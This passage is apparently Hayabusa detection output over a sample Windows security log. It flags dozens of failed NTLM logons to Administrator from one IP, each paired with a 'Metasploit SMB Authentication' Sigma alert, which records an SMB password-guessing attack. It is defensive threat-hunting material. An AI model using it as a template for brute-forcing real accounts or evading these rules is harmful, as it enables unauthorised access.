Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 